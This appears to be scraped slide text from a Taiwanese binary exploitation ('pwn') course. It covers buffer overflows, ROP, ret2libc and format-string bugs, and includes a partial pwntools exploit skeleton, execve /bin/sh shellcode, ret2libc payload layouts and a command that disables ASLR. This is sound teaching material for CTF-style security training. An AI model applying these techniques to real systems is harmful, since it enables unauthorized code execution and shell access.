Mais conteúdo relacionado Semelhante a TDOH x 台科 pwn課程 (20) TDOH x 台科 pwn課程15. Outline
• Buffer Overflow
• ROP ( Return Oriented Programing )
• ret2libc
• ret2text
• gadgets
• format string vulnerability
• CTF ( Attack & Defense )
18. x86 Stack Layout
buffer >>
EBP
Return Address
Arg 1
Arg 2
…
EBP
EBP + 0x04
EBP + 0x08
EBP + 0x0C
EBP - 0x04
EBP - 0x08
19. Buffer Overflow
void Function( arg1, arg2 ) {
char buffer[16];
…
…
scanf(“%s”, &buffer);
…
…
}
push ebp
mov ebp, esp
sub ebp, 0x10
…
…
———>
———>
buffer
EBP
Return Address
arg1
arg2
…
EBP
EBP + 0x04
EBP + 0x08
EBP + 0x0C
EBP - 0x04
EBP - 0x08
———>
EBP - 0x0C
EBP - 0x10
21. AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
AAAAAA AAAAAA AAAAAA AAAAAA
Buffer Overflow
31. Step #3
from pwn import *
r = process('./pratice1')
eip =
payload = 'a' * + p32(eip)
r.sendline(payload)
r.interactive()
37. Step #2
• Stack
• gdb ? gdb stack
• coredump
$ ulimit -c unlimited
$ sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/
core_pattern’
• jmp esp
41. Step #3Step #3
08048062 <starter>:
8048062: 31 c0 xor eax,eax
8048064: 40 inc eax
8048065: 40 inc eax
8048066: 40 inc eax
8048067: 40 inc eax
8048068: 40 inc eax
8048069: 40 inc eax
804806a: 40 inc eax
804806b: 40 inc eax
804806c: 40 inc eax
804806d: 40 inc eax
804806e: 40 inc eax
804806f: 31 c9 xor ecx,ecx
8048071: 51 push ecx
8048072: 68 2f 2f 73 68 push 0x68732f2f
8048077: 68 2f 62 69 6e push 0x6e69622f
804807c: 89 e3 mov ebx,esp
804807e: 31 d2 xor edx,edx
8048080: cd 80 int 0x80
ebx = “bin/shx00”
ecx= 0
eax= 11
edx = 0
execve
60. Step #2
• system ?
• “/bin/sh” ?
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
61. Step #3
• Write Payload
aaaa
aaaa
aaaa
aaaa
aaaa
system addr
fake ret address
“/bin/sh”
65. ROP - gadgets
R/W Register:
pop eax
ret
R/W Memory:
pop edx
pop eax
mov [eax],edx
ret
Logical Operation:
xor eax,eax
and eax,ecx
85. • oveflow binary puts write
fwrite …… got stdout
• got
• system ‘bin/sh’
• overflow
system(“/bin/sh”)
89. • pwntools ELF binary
• pwntools ELF.symbol[func_name] plt
• pwntools ELF.got[function_name] got
• puts leak got
• system ”bin/sh”
97. • format String %n
• %hn %hhn
• %n 4 byte (int)
• %hn 2 byte (short)
• %hhn 1 byte (byte)
106. IO Wrapper
• ?
• fork()
• pid_t pid = fork();
if ( pid == 0 ) {
/* sub process */
execvpe(…);
} else {
/* parent */
}
108. IO Wrapper
• while ( true ) {
fread(stdin, ….. );
/* may blocked */
fwrite(stdin_of_sub_process,…..);
fread(stdin, ….. );
/* may blocked */
fwrite(stdout, …..);
}
IO
Blocked
110. IO Wrapper
• select() and pselect() allow a program to monitor
multiple file descriptors, waiting until one or more of
the file descriptors become "ready" for some class
of I/O operation (e.g., input possible). A file
descriptor is considered ready if it is possible to
perform a corresponding I/O operation (e.g.,
read(2) without blocking, or a sufficiently small
write(2)).
http://man7.org/linux/man-pages/man2/select.2.html
119. LD_PRELOAD
• $ gcc -Wall -fpic -shared -o mylib.so mylib.c
• $ gcc -o main main.c
• $ LD_PRELOAD=./mylib.so
• $ ./main